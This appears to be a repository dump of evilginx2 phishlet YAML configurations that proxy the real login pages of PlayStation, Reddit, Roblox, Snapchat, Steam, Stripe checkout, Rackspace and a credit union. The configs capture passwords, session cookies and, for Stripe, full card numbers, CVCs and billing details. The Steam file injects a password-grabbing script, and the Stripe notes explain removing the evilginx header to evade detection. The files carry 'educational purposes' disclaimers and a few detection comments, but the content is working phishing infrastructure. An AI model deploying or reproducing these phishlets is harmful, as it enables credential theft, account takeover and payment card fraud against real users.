7 | - {phish_sub: 'accounts.api', orig_sub: 'accounts.api', domain: 'playstation.com', session: true, is_landing: true}
8 | - {phish_sub: 'smetrics.aem', orig_sub: 'smetrics.aem', domain: 'playstation.com', session: true, is_landing: true}
9 | - {phish_sub: 'eventcom.api.np.km', orig_sub: 'eventcom.api.np.km', domain: 'playstation.net', session: true, is_landing: true}
10 | - {phish_sub: 'pdr-srlc.api', orig_sub: 'pdr-srlc.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true}
11 |
12 | #lengtmp+oszxh@gmail.com
13 |
14 | sub_filters:
15 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
18 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'accounts.api', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
19 |
20 |
21 | - {triggers_on: 'www.playstation.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
22 | - {triggers_on: 'www.playstation.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
23 | - {triggers_on: 'www.playstation.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
24 |
25 |
26 | auth_tokens:
27 | - domain: '.sonyentertainmentnetwork.com'
28 | keys: ['bm_sz,opt','_abck,opt','s_cc,opt','s_sq']
29 | - domain: 'auth.api.sonyentertainmentnetwork.com'
30 | keys: ['JSESSIONID']
31 | - domain: 'id.sonyentertainmentnetwork.com'
32 | keys: ['akacd_pdr-id2-sencom-bdl,opt']
33 |
34 | credentials:
35 | username:
36 | key: 'username'
37 | search: '(.*)'
38 | type: 'post'
39 | password:
40 | key: 'password'
41 | search: '(.*)'
42 | type: 'post'
43 | login:
44 | domain: 'id.sonyentertainmentnetwork.com'
45 | path: '/signin/'
46 |
--------------------------------------------------------------------------------
/phishlet_examples/rackspace.yaml:
--------------------------------------------------------------------------------
1 |
2 | author: '@An0nud4y'
3 | min_ver: '2.3.0'
4 | proxy_hosts:
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'rackspace.com', session: true, is_landing: true}
6 | - {phish_sub: '', orig_sub: '', domain: 'rackspace.com', session: true, is_landing: false}
7 |
8 | sub_filters:
9 | - {triggers_on: 'login.rackspace.com', orig_sub: 'login', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
10 | - {triggers_on: 'login.rackspace.com', orig_sub: '', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
11 |
12 |
13 | auth_tokens:
14 | - domain: 'login.rackspace.com'
15 | keys: ['.*,regexp']
16 | auth_urls:
17 | - ''
18 | credentials:
19 | username:
20 | key: 'name="username"'
21 | search: '(.*)'
22 | type: 'post'
23 | password:
24 | key: 'name="password"'
25 | search: '(.*)'
26 | type: 'post'
27 | login:
28 | domain: 'login.rackspace.com'
29 | path: '/login'
30 |
31 |
--------------------------------------------------------------------------------
/phishlet_examples/reddit.yaml:
--------------------------------------------------------------------------------
1 | author: '@customsync'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'reddit.com', session: true, is_landing: true}
5 | - {phish_sub: 'win', orig_sub: 'www', domain: 'redditstatic.com', session: false, is_landing: false}
6 | - {phish_sub: 'events', orig_sub: 'events', domain: 'reddit.com', session: false, is_landing: false}
7 | sub_filters:
8 | - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
9 | - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
10 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
11 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
12 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'src="https://{hostname}', replace: 'src="https://{hostname}', mimes: ['text/html', 'application/json']}
13 | - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
14 | - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
15 | auth_tokens:
16 | - domain: '.reddit.com'
17 | keys: ['reddit_session']
18 | credentials:
19 | username:
20 | key: 'username'
21 | search: '(.*)'
22 | type: 'post'
23 | password:
24 | key: 'password'
25 | search: '(.*)'
26 | type: 'post'
27 | login:
28 | domain: 'www.reddit.com'
29 | path: '/login'
30 |
--------------------------------------------------------------------------------
/phishlet_examples/roblox.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | author: '@AN0NUD4Y'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'roblox.com', session: true, is_landing: true}
8 | - {phish_sub: '', orig_sub: '', domain: 'roblox.com', session: true, is_landing: false}
9 | - {phish_sub: 'assetgame', orig_sub: 'assetgame', domain: 'roblox.com', session: true, is_landing: false}
10 | - {phish_sub: 'auth', orig_sub: 'auth', domain: 'roblox.com', session: true, is_landing: false}
11 | - {phish_sub: 'metrics', orig_sub: 'metrics', domain: 'roblox.com', session: true, is_landing: false}
12 | - {phish_sub: 'realtime', orig_sub: 'realtime', domain: 'roblox.com', session: true, is_landing: false}
13 | - {phish_sub: 'apis', orig_sub: 'apis', domain: 'roblox.com', session: true, is_landing: false}
14 | - {phish_sub: 'locale', orig_sub: 'locale', domain: 'roblox.com', session: true, is_landing: false}
15 | - {phish_sub: 'accountsettings', orig_sub: 'accountsettings', domain: 'roblox.com', session: true, is_landing: false}
16 | - {phish_sub: 'js', orig_sub: 'js', domain: 'rbxcdn.com', session: true, is_landing: false}
17 | - {phish_sub: 'ecsv2', orig_sub: 'ecsv2', domain: 'roblox.com', session: true, is_landing: false}
18 | - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false}
19 | - {phish_sub: 'thumbnails', orig_sub: 'thumbnails', domain: 'roblox.com', session: true, is_landing: false}
20 | - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false}
21 | - {phish_sub: 'chat', orig_sub: 'chat', domain: 'roblox.com', session: true, is_landing: false}
22 | - {phish_sub: 'notifications', orig_sub: 'notifications', domain: 'roblox.com', session: true, is_landing: false}
23 | - {phish_sub: 'economy', orig_sub: 'economy', domain: 'roblox.com', session: true, is_landing: false}
24 | - {phish_sub: 'friends', orig_sub: 'friends', domain: 'roblox.com', session: true, is_landing: false}
25 |
26 | sub_filters:
27 | - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'roblox.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
28 | - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'rbxcdn.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
29 |
30 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
31 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
32 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
33 |
34 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
35 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
36 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
37 |
38 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
39 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
40 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
41 |
42 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
43 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
44 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
45 |
46 | auth_tokens:
47 | - domain: '.roblox.com'
48 | keys: ['GuestData', '.ROBLOSECURITY','RBXSessionTracker','.*,regexp']
49 | - domain: '.www.roblox.com'
50 | keys: ['gig_canary','gig_canary_ver' ,'.*,regexp']
51 |
52 | auth_urls:
53 | - '/home'
54 | - '/home/.*'
55 | credentials:
56 | username:
57 | key: 'cvalue'
58 | search: '(.*)'
59 | type: 'post'
60 | password:
61 | key: 'password'
62 | search: '(.*)'
63 | type: 'post'
64 | custom:
65 | - key: 'ctype'
66 | search: '(.*)'
67 | type: 'post'
68 |
69 | login:
70 | domain: 'www.roblox.com'
71 | path: '/Login'
--------------------------------------------------------------------------------
/phishlet_examples/snapchat.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | author: '@an0nud4y'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'snapchat.com', session: true, is_landing: true}
8 | - {phish_sub: '', orig_sub: '', domain: 'snapchat.com', session: true, is_landing: false}
9 | - {phish_sub: 'www', orig_sub: 'www', domain: 'snapchat.com', session: true, is_landing: false}
10 | - {phish_sub: 'csp-central', orig_sub: 'csp-central', domain: 'appspot.com', session: true, is_landing: false}
11 |
12 | sub_filters:
13 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
14 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
15 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
16 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
17 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
18 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
19 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
20 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
21 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
22 |
23 | auth_tokens:
24 | - domain: '.snapchat.com'
25 | keys: ['sc-a-nonce', '.*,regexp']
26 | - domain: 'accounts.snapchat.com'
27 | keys: ['web_client_id', 'sc-cookies-accepted', 'sc-a-csrf', 'sc-a-session', 'xsrf_token', '.*,regexp']
28 | auth_urls:
29 | - '/accounts/welcome'
30 | credentials:
31 | username:
32 | key: 'username'
33 | search: '(.*)'
34 | type: 'post'
35 | password:
36 | key: 'password'
37 | search: '(.*)'
38 | type: 'post'
39 | login:
40 | domain: 'accounts.snapchat.com'
41 | path: '/accounts/login'
42 |
--------------------------------------------------------------------------------
/phishlet_examples/steam.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | author: '@An0nud4y'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: '', orig_sub: '', domain: 'steamcommunity.com', session: true, is_landing: true}
8 |
9 | sub_filters:
10 | - {triggers_on: 'steamcommunity.com', orig_sub: 'login', domain: 'steamcommunity.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html$
11 |
12 | auth_tokens:
13 | - domain: 'steamcommunity.com'
14 | keys: ['xf_user', 'xf_session']
15 |
16 | credentials:
17 | username:
18 | key: 'username'
19 | search: '(.*)'
20 | type: 'post'
21 | password:
22 | key: 'unenc_password'
23 | search: '(.*)'
24 |
25 | login:
26 | domain: 'steamcommunity.com'
27 | path: '/login/home/'
28 |
# Review note (detection): this js_inject entry is scoped to steamcommunity.com and the path /login/home/.
# 2.5 s after it runs, the script sets an inline onclick="sendPass()" attribute on the first button[type=submit].
# sendPass() reads the value of the first element named "password" and sends it, URL-encoded, in a separate
# asynchronous XHR POST as the form parameter unenc_password (the same name as the credentials.password key above).
# Observable indicators: an inline onclick handler on the submit button that the page's own markup does not
# contain, and an extra form-encoded POST that carries the typed password in the clear under that parameter.
29 | js_inject:
30 | - trigger_domains: ["steamcommunity.com"]
31 | trigger_paths: ["/login/home/"]
32 | trigger_params: []
33 | script: |
34 | function onclickListener(){
35 | var submit = document.querySelectorAll('button[type=submit]')[0];
36 | submit.setAttribute("onclick", "sendPass()");
37 | return;
38 | }
39 | function sendPass(){
40 | var password = document.getElementsByName("password")[0].value;
41 | var xhr = new XMLHttpRequest();
42 | xhr.open("POST", '/login/device-based/regular/login/', true);
43 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
44 | xhr.send("unenc_password="+encodeURIComponent(password));
45 | return;
46 | }
47 | setTimeout(function(){ onclickListener(); }, 2500);
48 |
49 |
50 |
51 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
52 | # PLEASE DO NOT MISUSE THIS PHISHLET.
53 |
--------------------------------------------------------------------------------
/phishlet_examples/stripe.yaml:
--------------------------------------------------------------------------------
1 | # Checkout Docs for reference
2 | # https://stripe.com/docs/connect/creating-a-payments-page?destination-or-on-behalf-of=destination
3 |
4 | # Steps to follow to integrate evilginx checkout in original payment checkout page
5 | #
6 | # 1) Replace all occurences of stripe.com in html files or in js files with evilginx2 domain
7 | # 2) Read docs for other possible issues (Mentioned Above)
8 | # 3) Also look at domain name stripe.network and change it with evilginx domain in all js and html files in checkout page of website.
9 | # 4) Handling lure is difficult and will require a heavy evilginx2 source code modification, Alternate solution is to inject js in the website index or any page which will trigger the evilginx2 lure and create a valid evilginx session for that user.
10 | #
11 |
12 |
13 |
14 | # Checkout Page -
15 | #
16 | # https://checkout.stripe.com/c/pay/cs_live_b1VLOZemyS8VFjpL7CKqeF83LqaFkITaQd2uWgK0fdZ4D2qF5PBtN9itwh#fidkdWxOYHwnPyd1blppbHNgWmM0dDRLQF9IYDxNQ2c2U3VsYUZVfDJDYycpJ2hsYXYnP34nYnBsYSc%2FJ0tEJyknaHBsYSc%2FJzw9ZDw8MWRkKGY8MGcoMTQyPChkMGNgKDcwPDQwNTA2MzVgN2M3YGdmNycpJ3ZsYSc%2FJzZjZ2NkZDA9KGQ8YWAoMTVjZihnNzA9KDwxYDAzNzAwNjQ8ZzAzN2YwMid4KSdnYHFkdic%2FXlgpJ2lkfGpwcVF8dWAnPydocGlxbFpscWBoJyknd2BjYHd3YHdKd2xibGsnPydtcXF1dj8qKnJycitof3ZubGsrZmpoJ3gl
17 |
18 |
19 | ## List of SubDomains ---
20 | # https://m.stripe.com
21 | # https://m.stripe.network/
22 | # https://js.stripe.com
23 | # https://q.stripe.com
24 | # https://api.stripe.com/
25 | # https://r.stripe.com/
26 | # https://stripe-camo.global.ssl.fastly.net/
27 | # https://checkout.stripe.com
28 |
29 |
30 |
31 |
32 |
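33 | # Note: Do not Forget to remove the easter egg codes from evilginx2 (http_proxy.go),
34 | # Search for 'cantFindMe' and 'egg' in http_proxy.go and comment all relevant code to remove the evilginx header (X-Evilginx)
35 | # Detection note: the X-Evilginx header is only present where that code is left in place, so its absence does not rule out a proxied session.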
36 |
37 | name: 'stripe'
38 | author: '@an0nud4y'
39 | min_ver: '2.4.0'
40 | proxy_hosts:
41 | - {phish_sub: 'checkout', orig_sub: 'checkout', domain: 'stripe.com', session: true, auto_filter: true, is_landing: true}
42 | - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
43 | - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.network', session: false, auto_filter: true, is_landing:false}
44 | - {phish_sub: 'js', orig_sub: 'js', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
45 | - {phish_sub: 'q', orig_sub: 'q', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
46 | - {phish_sub: 'api', orig_sub: 'api', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
47 | - {phish_sub: 'r', orig_sub: 'r', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
48 | - {phish_sub: 'stripe-camo.global.ssl', orig_sub: 'stripe-camo.global.ssl', domain: 'fastly.net', session: false, auto_filter: true, is_landing:false}
49 |
50 | sub_filters:
51 | - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
52 | - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
53 |
54 | auth_tokens:
55 | - domain: '.stripe.com'
56 | keys: ['.*,regexp']
57 | - domain: 'm.stripe.com'
58 | keys: ['.*,regexp']
59 | - domain: 'stripe.com'
60 | keys: ['.*,regexp']
61 |
62 | credentials:
63 | username:
64 | key: 'card[number]'
65 | search: '(.*)'
66 | type: 'post'
67 | password:
68 | key: 'card[cvc]'
69 | search: '(.*)'
70 | type: 'post'
71 | custom:
72 | - key: 'type'
73 | search: '(.*)'
74 | type: 'post'
75 | - key: 'card[number]'
76 | search: '(.*)'
77 | type: 'post'
78 | - key: 'card[cvc]'
79 | search: '(.*)'
80 | type: 'post'
81 | - key: 'card[exp_month]'
82 | search: '(.*)'
83 | type: 'post'
84 | - key: 'card[exp_year]'
85 | search: '(.*)'
86 | type: 'post'
87 | - key: 'billing_details[name]'
88 | search: '(.*)'
89 | type: 'post'
90 | - key: 'billing_details[email]'
91 | search: '(.*)'
92 | type: 'post'
93 | - key: 'guid'
94 | search: '(.*)'
95 | type: 'post'
96 | - key: 'muid'
97 | search: '(.*)'
98 | type: 'post'
99 | - key: 'sid'
100 | search: '(.*)'
101 | type: 'post'
102 | - key: 'payment_user_agent'
103 | search: '(.*)'
104 | type: 'post'
105 |
106 |
107 | auth_urls:
108 | - '/'
109 | - '/c'
110 |
111 | login:
112 | domain: 'checkout.stripe.com'
113 | path: '/'
114 |
--------------------------------------------------------------------------------
/phishlet_examples/sununion.yaml:
--------------------------------------------------------------------------------
1 | author: '@an0nud4y'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'www', orig_sub: 'www', domain: 'suncoastcreditunion.com', session: true, is_landing: true}
- {phish_sub: '', orig_sub: '', domain: 'suncoastcreditunion.com', session: true, is_landing: false}
- {phish_sub: 'banking', orig_sub: 'banking', domain: 'suncoastcreditunion.com', session: true, is_landing: false}
sub_filters:
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
auth_tokens:
- domain: '.suncoastcreditunion.com'
keys: ['.*,regexp']
- domain: 'banking.suncoastcreditunion.com'
keys: ['.*,regexp']
